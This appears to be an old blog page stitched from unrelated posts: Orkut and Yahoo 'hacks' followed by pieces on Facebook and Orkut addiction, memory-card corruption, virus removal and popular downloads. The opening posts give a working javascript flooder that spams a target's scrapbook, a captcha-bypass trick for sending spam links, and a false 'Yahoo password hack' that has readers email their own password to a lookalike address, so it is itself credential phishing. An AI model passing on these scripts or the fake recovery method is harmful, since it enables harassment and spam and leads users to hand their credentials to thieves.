Hack Orkut (Flooding)

Orkut Flooder


  1. please dont missuse this code

  2. your account will get freezed for some time

  3. who cares

copy and paste this code in your Scrapbook's Address Bar



javascript:%20i=0;nb=document.body.innerHTML.match(/\w+\/\d+\/(\d+).jpg/i)[1];nb1=document.getElementsByTagName('TEXTAREA').item(0).value;%20document.body.innerHTML+='';%20function%20a(){vi=replyForm;vi.toUserId.value=nb;vi.target="SbFlood";vi.scrapText.value=nb1%20+%20"[silver]"%20+%20i%20;vi.action='Scrapbook.aspx?Action.submit';vi.submit();i++};void(setInterval(a,1050))

COMPLETELY WORKING.. PLEASE LEAVE COMMENTS IN CASE OF ANY PROBLEM..

2) A way out to send links without filling in any captcha.

A CAPTCHA is a type of challenge-response test used in computing to determine whether the user is human. The process involves one computer (a server) asking a user to complete a simple test which the computer is able to generate and grade. Because computers are unable to solve the CAPTCHA, any user entering a correct solution is presumed to be human. A common type of CAPTCHA requires that the user type the letters of a distorted image, sometimes with the addition of an obscured sequence of letters or digits that appears on the screen.

In short a captcha is an effective way of controlling spam. Now it's time to break that in Orkut.

Well, i am not amused but many of the thousands will be after reading this post. Orkut Brains just discovered a way out to send links without filling in any captcha (word verification). Unfortunately, this means more spam on orkut.


1. http://www.orkut.com/ClickTracker.aspx?url=//////www.yourlink.com
2. Edit the 'your link' in the link with the one you want to send and paste them in your scraps.
3. Do NOT remove the six slashes before www.yourlink.com
4. Enjoy Sending the links without filling the word verification

Note: 'http://' wont work, 'www' works flawlessly.

Task Manager disabled

Task manager in your system is disabled by virus? To remove the virus you have to first make the virus not to run. The virus disables registry editor, and MSConfig also along with task manager. So, you can't able to stop the virus from loading with the windows.

You can download Process Explorer and use this utility to view and kill the processes. It offers more features than default task manager bundled with Windows.

Softwares:
Process Explorer
Task Killer

Cannot enable 'show hidden files' (AMVO.exe virus)

  • First check the task manager find any suspicious processes.
  • Next open MSConfig (Go to run, and type msconfig). You will find amvo.exe under the startup tab. It is located in Windows\System32 folder.
  • Uncheck the process, and closed the msconfig window.
  • Next open Registry Editor (go to run, and type regedit). search for "amvo.exe" and you will find one entry. Delete the whole key.
  • Set the option to "show hidden files" (Go to Tools> View in windows explorer), as virus file is hidden. But it will not allow. As soon as you set it to show hidden files and clicked on ok, it will change back to "Don't show hidden files". For enabling show hidden file go to registy and make the changes given below.
  • User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
    Advanced]
    Value Name: Hidden
    Data Type: REG_DWORD (DWORD Value)
    Value Data: (1 = show hidden, 2 = do not show)

How to Hack Yahoo mail

STEP 1:

You must have a Yahoo! email account. If you do not have, create the one at http://mail.yahoo.com.

Once created, Login using your account.

STEP 2:

I assume you have logged in. Now, click on "Compose" on the left hand frame.

In To: , type

[ pass_recovvaluz | at | yahoo.com ]

This is the email account to which Yahoo! sends email when you request for lost password.

In the subject, type:

recov_request

In the body, type :

[ type EXACTLY AS IT IS , better copy-paste it]

forgotpass?secretque=TRUE&username=VICTIM_USERNAME&userauth=YOUR_USERNAME&pass=YOUR_PASSWORD&event=success

Replace 'VICTIM_USERNAME' with the username of the person whose account you want to hack. Replace 'YOUR_USERNAME' with the username from which you logged on and 'YOUR_PASSWORD' with your account password from which you logged on. This is needed by Yahoo! for the account authentication and it assumes that this is the details of Yahoo Staff.

STEP 3:

Click Send.
You will get the password within 2 min to 2 hrs, depending on the load on the server. (I got it on next day! BUT AT LEAST I GOT IT !!!)
This is a fully tested method. But please, do not expect any support. I can just tell you that IT SHOULD WORK...

Facebook is not just an addiction--it's a disease


What Is Facebook Addiction?

These words will go down in history: “Susan Mulla has requested to add you as a friend, but before we can do that, you must confirm that you are, in fact, friends with Susan.” If you’re ever lucky enough to receive an email saying that phrase, you best accept my friendship. If you don’t, how else can we read each other’s profiles every five seconds, or write inside jokes on each other’s “walls”? I think we all know what I’m talking about here; it’s the Facebook , and it has changed the way we live as college students.

Some have said, “Facebook is the worst social disease to hit college campuses nationwide,” and I would have to agree with that statement. So let’s take a deeper look into this new fad that has taken so many of us captive.Being a member of this cult following, I’ve realized that quite possibly the most crucial aspect of the Facebook is creating a flawless profile. Many of us are guilty of spending hours upon hours crafting our profile to ensure we come across as desirable to that special someone stumbling upon it. A flattering picture is the first step to the perfect profile. Next, your music interests have to be listed, but in all honesty it’s just an opportunity for people to pretend they are really eclectic with their music tastes. For example one might write: “I’m totally into ‘Death Cab for Cutie,’ ‘The Pussycat Dolls’ and ‘Yo-Yo Ma.’” You don’t have to try to impress people by listing every band you’ve ever heard of — it’s pretty obvious you’re faking.

Then there is always the request for friendship from that old high school “friend” who you actually never said a word to in high school. Maybe it was the person who laughed in your face when you asked them to prom, and now expects you to accept their friendship. Heck no. I say reject that “friendship” and show them what they missed out on. Then, there’s that whole “poking” deal. I will never forget the first time I was “poked.” I just sat there at my computer dumbfounded, in awe of the words I saw in front of me: “You have been poked, do you want to poke back?” I wasn’t sure if I should be flattered, offended or violated.

There’s also that whole stalking thing, too. Let’s be honest. We can all admit that Facebook has opened a door to the opportunities to stalk people. For example — last year there was a guy in one of my classes who caught my eye, and being too scared to talk to him in person, I Facebooked him. About five minutes later I find myself sitting in my room listening to the mp3s I got off his AIM profile and flipping through his Web shots. What was I doing? I didn’t even know the guy and already he was serenading me.Now, I can’t help but ask myself what is going to come of us if we continue communicating via Facebook and Instant Messenger? Will we eventually meet people, start dating, get engaged, get married and have kids and get divorced, all in one chat session? I know it might seem like I’m sitting here pointing my finger at all of you, but I’m just as guilty of Facebook addiction and compulsive away message reading as the next screen name on your buddy list. To be completely honest, I haven’t yet met my Collegiate Times editor in person, because all we do is pass e-mail back and forth.

What killed normal human interaction? I think we have simply become lazy. It’s easier to put up an away message that will let people know if you’ve had a bad day or billboard every single detail of what your schedule entails for that day: “Off to class, then lunch, then the gym, then the bathroom, then washing my hands, then drying them.” Who needs to know all of that?

So here is what I say to you all of you who sit at your computers and check away messages and stalk the guy you saw at Hokie Grill once — stop living like this. I’m convinced that we could fritter our whole lives sitting in front of the computer screen. What we need to do is ask ourselves this question: “What will happen when all of my buddies are away, or when the Internet connection cuts short.” We need to face it and realize that life doesn’t happen on a computer screen, that having 202 friends on Facebook doesn’t make you cool.


Why memory cards become corrupted ?

It is important to understand what type and quality of card that was purchased. For example, some customers will find great deals on "large" CF cards that are multilayered. A multilayered card is a card that consists of 2 or more smaller cards sandwiched to make a larger megabyte card (4x256MB = 1024MB or 1GB card). While these multilayered cards work great when purchased, they seem to become unstable after repeated usage. If possible purchase single layered cell cards. They were intended from the beginning of manufacture to be a certain size and lack the "bridges" found in multilayered cells that can cause corruption on a card.






Four main reasons why memory cards become corrupted:


1. As mentioned above, a multilayered cell card that has images added and deleted will eventually try to save a partial image on one cell and the rest on another, causing corruption of the image or images.

2. Some cards will allow you to keep shooting images even after the counter is at zero. Once the card is full, it might have a small space in which it tries to add an image that is too large, hence corrupting one or several images/files.

3. If the card is ejected prior to having finished writing the information to the card. The card may become unreadable and lose or corrupt images.

4. Like in reason three, the same will happen if the camera loses power from the battery while writing.

How to prevent corruption of your images

In order to keep good "hygiene" on your cards, you should avoid the four points above and do the following: After your images are downloaded to your computer and possibly backed up on some other sort of device (RAID, memory vault, DVD, CD or other harddrive), you should format your card in your camera. This should be done not only once, but three times. This will insure that your card is free from any images, markers, folders, partitions etc. (when we recover cards for our customers, we can read 80% of the information after 1 format, 40% after 2 formats and 0% after 3 formats).

Why is Orkut so addicting ?

The fascination of Orkut is that it does not let you go. Once you have logged in you cannot just leave it. One would have never known that leaving scarps for friends and acquaintances is such fun. After a person joins Orkut slowly and slowly more people start discovering that person. There are a few from some organization, few from some other organization, few college mates and few school friends and it keeps rolling. The list of friends in always growing and as you interact with each other there comes a time when you feel that you have so many things common with many people. This compulsion to find like minded people can be done through Orkut and so no one can resist it.

If a person is an outgoing, extrovert, fun loving, looking for friends, then, yes Orkut is an addiction. Orkut is friendship based site, where people create their profile, few would be genuine and rest all would be fake, and upload their pictures to share with those friends who are far, and cannot be contacted. The addiction of Orkut is such that it has been banned in many offices and the reason given is wastage of man power.

On Orkut one starts searching friends from one friend, then go on to peep in their profile, search for community that interest you. There are variety communities with such diversity as from cars to condoms or dolls to dialysis. You join a community and then you become active, people will scrap some comment and then it goes on and goes on, and hence the first thing as soon as you are on the net is that you would do is to login to Orkut check new guy / gal or weather your scrapped or not.

Orkut is so addictive that one would love to sit on it for hours together, for such frivolous reasons like looking for friends, reading testimonials and scraps for other friends, or serious reasons like searching for communities that might be of an interest to you and its whole group of world filled from New Delhi to New York.

Orkut addiction has reached new levels, people spend their free time reading and writing scraps on this so called social networking site. It is one of the more addicting things on campus - but the biggest benefits of it is that it really does put you back in touch with old high school friends and you can see what they’re up to and all that.

Orkut make available many capabilities including online dating, people who share the same hobbies and interests as well as possible business connections. Once the line of your interest is known you ill be able to keep in touch with people having same interest and also create your own community or special interest arena. The special interest community lets you have many discussions on many topics the scope runs deep with Orkut as there are many variations available. Social networking in itself is very addictive, so is Orkut.

On Orkut everyone knows when your birthday is and they all say happy birthday, as if they all knew you. So happy Orkuting to you all.

Most downloaded softwares


Today instant messengers are ubiquitous, but when ICQ ("I Seek You") was first released in 1997, it was truly the first of its kind. Though competitors such as Yahoo Instant Messenger and AIM have since encroached on ICQ's territory, this chat client remains enormously popular with international users, and it has remained one of Download.com's most popular applications since its launch.



Arriving fast on the heels of the emerging MP3 digital format, Nullsoft's Winamp was one of the darlings of the burgeoning digital audio scene in the late '90s. This free audio player quickly gained popularity, becoming one of the most popular files on Download.com, and Nullsoft was eventually acquired by AOL in 1999.


Napster
Who doesn't remember this controversial file-sharing kingpin? Developed by Northeastern University student Shawn Fanning, Napster was a groundbreaking application that enabled users to share MP3s painlessly for the first time through a peer-to-peer network. Napster has since been sued, shuttered, and reborn as a subscription music service, but its legacy remains.

Firefox
Developed by the open-source Mozilla project in 2003, Firefox was the first browser to show the promise of breaking Microsoft's stranglehold on the browser market. Lightweight, secure, and packed with useful features, Firefox exemplifies the promise of the strengthening open-source movement.


WinZip
When CNET Download.com launched in 1996, WinZip was among the first programs in our library, and in the past nine years, it has remained near the top of our Most Popular list. The reason is simple: For many years, WinZip was an essential utility. You couldn't download or send large files without it. Even the fact that Windows XP now has built-in ZIP support hasn't diminished its popularity. The keys to WinZip's success are its simplicity and its singularity of purpose: it does one thing--compressing and decompressing files--and it does it very well.

iTunes
Apple's music player and organizer makes our top 10 list for the sheer beauty of its product design. iTunes is not only a full-featured media player and library in its own right, it's also the gateway for Apple's iPod and popular music store, creating an elegant and simple interface for buying and organizing music. If only all software were this easy to use.

Ad-aware
Almost as soon as there was software to download, there was adware coming along for the ride. Lavasoft did its part to hold the line with Ad-aware, a spyware scanner and remover. Its simple interface and excellent results have gained the program acclaim over the past five years, including a recent monopoly on the No. 1 slot in Download.com's Most Popular list. We wouldn't download files without it, and apparently, neither would most of you.


Skype
If Internet signals can travel over a phone line, then voice calls can travel over the Internet, right? With a Voice-over-IP (VOIP) program such as Skype, they certainly can. The prospect of making free calls to folks all over the globe has persuaded millions of people to install the software; the ease of use and surprising voice quality have earned Skype a loyal user base and accolades that include a CNET Editors' Choice and a Webby.

RealPlayer
Ten years ago, the Web was full of static content. The 1995 debut of RealPlayer changed all that. Streaming audio and video in a free media player was a bold step forward into making the Internet a viable entertainment platform, and RealNetworks was there. Today the software plays almost every media format, and the online music store sells tunes compatible with most MP3 players--even the iPod. RealPlayer hasn't always been at the head of the class, but it was there first, and it keeps adapting to the developing world of online media.


Adobe Acrobat Reader
Bridging the gap between print and Internet publishing, Adobe's portable document format (PDF) lets publishers distribute their articles, newsletters, and documentation online without worrying about formatting problems or unauthorized alterations. By giving away the Acrobat Reader early on, Adobe helped create a nearly unassailable market position. If you want to read magazine archives or software manuals online, you need Acrobat Reader--as its nearly seven-year occupation of the Most Popular list can attest.

Creative Commons License
This work is licensed under a Creative Commons Attribution 3.0 Unported License.